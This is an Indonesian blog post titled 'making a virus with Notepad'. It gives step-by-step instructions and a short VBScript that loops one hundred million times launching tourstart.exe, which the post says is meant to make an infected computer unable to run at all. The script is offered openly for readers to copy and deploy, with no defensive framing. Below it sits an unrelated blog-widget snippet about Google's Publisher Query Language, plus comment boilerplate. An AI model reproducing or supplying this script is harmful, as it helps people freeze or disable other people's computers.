Membuat virus dengan notepad.
Membuat virus bukanlah merupakan hal yang sulit. Karena, kita dapat membuatnya dengan notepad yang terdapat di semua komputer yang memakai Windows.
Virus yang akan kita buat ini, adalah virus yang membuat komputer yang terinfeksi menjadi tidak bisa berjalan sama sekali.
Let`s Begin!
langkah-langkah:
1. buka notepad
2. copy+paste bahasa pemograman(yang bercetak tebal) di bawah ini:
option explicit
dim wshshell
set wshshell=wscript.createobject("wscript.shell")
dim x
for x = 1 to 100000000
wshshell.run "tourstart.exe"
next
Taking a closer look at the Publisher Query Language and the future
-
I get this article from GoogleBlog. This is the article :
Recently we launched v201004, and with that introduced the new Statement
object which gives supp...
15 tahun yang lalu
0 komentar:
Posting Komentar
Kalau habis baca artikel ini tolong comment ya :')